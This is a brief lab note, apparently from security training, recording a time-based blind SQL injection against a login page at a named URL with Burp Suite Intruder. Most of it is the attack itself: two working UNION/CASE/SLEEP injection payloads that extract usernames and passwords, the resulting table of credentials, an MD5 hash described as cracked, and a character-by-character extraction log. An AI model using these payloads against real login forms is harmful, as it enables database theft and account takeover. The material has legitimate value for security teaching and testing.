Lab : https://issauga.lt/login-6/index.php

We have to perform a time-based SQL Injection using BurpSuite's Intruder
Learn about Intruder: https://portswigger.net/burp/documentation/desktop/tools/intruder
Learn about Time-Based SQL Injection: https://www.youtube.com/watch?v=vhDhB9uVbGA&list=PLuyTk2_mYISLaZC4fVqDuW_hOk0dd5rlf&index=14

Final Payload
----------------
Payload#1 (Extract Username)
------------
username = asd' union select 'a',(select case when (substr((select name from users limit 3,1),§1§,1)='§a§') then sleep(4) else 'b' end)-- -
password = anything

Payload#2 (Extract Password)
------------
username = asd' union select 'a',(select case when (substr((select password from users where name='HARRY'),§1§,1)='§a§') then sleep(4) else 'b' end)-- -
password = anything


Data Extracted
-----------------------
Table : users
username | password |
----------------------
admin	| admin    |
-----------------------
tom	| tom	   |
-----------------------
ron	| ron	   |
-----------------------
HARRY	| 5f4dcc3b5aa765d61d8327deb882cf99 === After Cracking MD5 Hash -> password

1 5
2 f
3 4
4 d
5 c
6 c
7 3
8 b
9 5
10 a
11 a
12 7
13 6
14 5
15 d
16 6
17 1
18 d
19 8
20 3
21 2
22 7
23 d
24 e
25 b
26 8
27 8
28 2
29 c
30 f
31 9
32 9